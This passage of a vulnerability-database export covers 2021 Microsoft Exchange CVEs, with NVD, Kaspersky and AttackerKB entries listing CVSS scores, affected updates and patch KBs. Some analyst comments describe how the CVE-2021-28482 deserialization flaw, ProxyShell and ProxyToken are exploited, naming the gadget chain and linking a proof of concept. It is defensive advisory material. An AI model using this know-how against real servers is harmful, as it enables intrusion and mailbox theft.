"cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-33766", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33766", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:29:21", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-34470, CVE-2021-34523.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-33768", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.2, "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2022-05-03T16:04:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-33768", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-33768", "cvss": {"score": 5.2, "vector": "AV:A/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_10:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_21:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:40", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34470.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-34523", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-34523", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34523", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:31", "description": "Microsoft Exchange Server Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-33768, CVE-2021-34523.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-34470", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 5.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.2, "vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34523"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-34470", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34470", "cvss": {"score": 5.2, "vector": "AV:A/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_10:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_21:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:42:09", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31206, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-31196", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-07-17T03:31:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-31196", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31196", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_21:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_10:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:42:10", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-34473.", "cvss3": {"exploitabilityScore": 2.1, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.0, "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-31206", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 5.5, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.9, "vectorString": "AV:A/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2021-09-20T12:20:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-31206", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31206", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_21:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_10:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:30:31", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-14T18:15:00", "type": "cve", "title": "CVE-2021-34473", "cwe": ["CWE-918"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-34473"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:exchange_server:2016", "cpe:/a:microsoft:exchange_server:2013", "cpe:/a:microsoft:exchange_server:2019"], "id": "CVE-2021-34473", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-34473", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_19:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2016:cumulative_update_20:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_9:*:*:*:*:*:*", "cpe:2.3:a:microsoft:exchange_server:2019:cumulative_update_8:*:*:*:*:*:*"]}], "kaspersky": [{"lastseen": "2023-05-27T15:01:42", "description": "### *Detect date*:\n04/13/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nRemote code execution vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Affected products*:\nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 20 \nMicrosoft Exchange Server 2019 Cumulative Update 9 \nMicrosoft Exchange Server 2016 Cumulative Update 19 \nMicrosoft Exchange Server 2019 Cumulative Update 8\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-28480](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-28480>) \n[CVE-2021-28482](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-28482>) \n[CVE-2021-28483](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-28483>) \n[CVE-2021-28481](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-28481>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-28482](<https://vulners.com/cve/CVE-2021-28482>)\n\n### *KB list*:\n[5001779](<http://support.microsoft.com/kb/5001779>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "kaspersky", "title": "KLA12137 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-22T00:00:00", "id": "KLA12137", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12137/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:59:05", "description": "### *Detect date*:\n07/13/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Exchange Server. Malicious users can exploit these vulnerabilities to execute arbitrary code, gain privileges, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Exchange Server 2019 Cumulative Update 10 \nMicrosoft Exchange Server 2019 Cumulative Update 9 \nMicrosoft Exchange Server 2013 Cumulative Update 23 \nMicrosoft Exchange Server 2016 Cumulative Update 20 \nMicrosoft Exchange Server 2019 Cumulative Update 8 \nMicrosoft Exchange Server 2016 Cumulative Update 19 \nMicrosoft Exchange Server 2016 Cumulative Update 21\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31196](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31196>) \n[CVE-2021-34470](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34470>) \n[CVE-2021-31206](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31206>) \n[CVE-2021-34473](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34473>) \n[CVE-2021-34523](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-34523>) \n[CVE-2021-33766](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33766>) \n[CVE-2021-33768](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33768>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Exchange Server](<https://threats.kaspersky.com/en/product/Microsoft-Exchange-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-31196](<https://vulners.com/cve/CVE-2021-31196>)6.5High \n[CVE-2021-34470](<https://vulners.com/cve/CVE-2021-34470>)5.2High \n[CVE-2021-31206](<https://vulners.com/cve/CVE-2021-31206>)7.5Critical \n[CVE-2021-34523](<https://vulners.com/cve/CVE-2021-34523>)7.5Critical \n[CVE-2021-33766](<https://vulners.com/cve/CVE-2021-33766>)5.0Critical \n[CVE-2021-33768](<https://vulners.com/cve/CVE-2021-33768>)5.2High\n\n### *KB list*:\n[5001779](<http://support.microsoft.com/kb/5001779>) \n[5004780](<http://support.microsoft.com/kb/5004780>) \n[5004778](<http://support.microsoft.com/kb/5004778>) \n[5004779](<http://support.microsoft.com/kb/5004779>) \n[5003611](<http://support.microsoft.com/kb/5003611>) \n[5003612](<http://support.microsoft.com/kb/5003612>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "kaspersky", "title": "KLA12224 Multiple vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31196", "CVE-2021-31206", "CVE-2021-33766", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-07-30T00:00:00", "id": "KLA12224", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12224/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T14:41:15", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28481, CVE-2021-28482, CVE-2021-28483.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-28480", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-15T00:00:00", "id": "AKB:5E39190B-F5C9-4C2C-ABBF-7BAE3C89DB41", "href": "https://attackerkb.com/topics/0FMSuRMBCt/cve-2021-28480", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:09:32", "description": "Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-28480, CVE-2021-28481, CVE-2021-28483.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at June 03, 2021 1:07pm UTC reported:\n\nThis vulnerability is a deserialization flaw in Exchange\u2019s `MeetingPollProposeOptionsPayload.GetRequests()` method. This method can be triggered with an HTTP request and when issued a specially crafted XML payload, can lead to OS command execution within the context of the `w3wp.exe` process which has SYSTEM level privileges.\n\nThe XML payload is a .NET serialized object which contains the ObjectDataProvider chain from [YSoSerial.NET](<https://github.com/pwntester/ysoserial.net>) and the `DataContractSerializer` formatter. The payload needs to be crafted to be compatible with the way in which Exchange deserializes it.\n\nSince many users have sufficient access to authenticate to Exchange, this could easily be used in conjunction with a phishing or password guessing attack and lead to an initial breach.\n\nThere was a [blog](<https://translate.google.com/translate?hl=en&sl=vi&u=https://testbnull.medium.com/microsoft-exchange-from-deserialization-to-post-auth-rce-cve-2021-28482-e713001d915f&prev=search&pto=aue>) detailing this vulnerability and a [PoC](<https://www.notion.so/zerosteiner/CVE-2021-28482-9ea5c7da92b04bc7b37b985d169c7f6d#ca357c2bbcd64f15a59bf8a4ac7cfc58>) written by the same author. The PoC is non-functional without being edited.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "attackerkb", "title": "CVE-2021-28482", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-15T00:00:00", "id": "AKB:84478BB4-7D6D-43CE-8EF1-9CF669B0A51C", "href": "https://attackerkb.com/topics/vB17DB3c0v/cve-2021-28482", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-07T00:04:03", "description": "ProxyShell is an exploit chain targeting on-premise installations of Microsoft Exchange Server. It was demonstrated by Orange Tsai at Pwn2Own in April 2021 and is comprised of three CVEs that, when chained, allow a remote unauthenticated attacker to execute arbitrary code on vulnerable targets. The three CVEs are CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207.\n\nDetails are available in Orange Tsai\u2019s [Black Hat USA 2020 talk](<https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf>) and follow-on [blog series](<https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html>). ProxyShell is being broadly exploited in the wild as of August 12, 2021.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at August 12, 2021 9:19pm UTC reported:\n\nCheck out the [Rapid7 analysis](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis>) for details on the exploit chain. Seems like a lot of the PoC implementations so far are using admin mailboxes, but I\u2019d imagine folks are going to start finding ways around that soon.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-20T00:00:00", "type": "attackerkb", "title": "ProxyShell Exploit Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523"], "modified": "2021-08-20T00:00:00", "id": "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "href": "https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-15T17:37:22", "description": "Microsoft Exchange Information Disclosure Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at August 30, 2021 4:59pm UTC reported:\n\nAn unauthenticated actor can perform configuration actions on mailboxes belonging to arbitrary users. Which can be used to copy all emails addressed to a target and account and forward them to an account controlled by the threat actor.\n\n<https://www.zerodayinitiative.com/blog/2021/8/30/proxytoken-an-authentication-bypass-in-microsoft-exchange-server>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-07-14T00:00:00", "type": "attackerkb", "title": 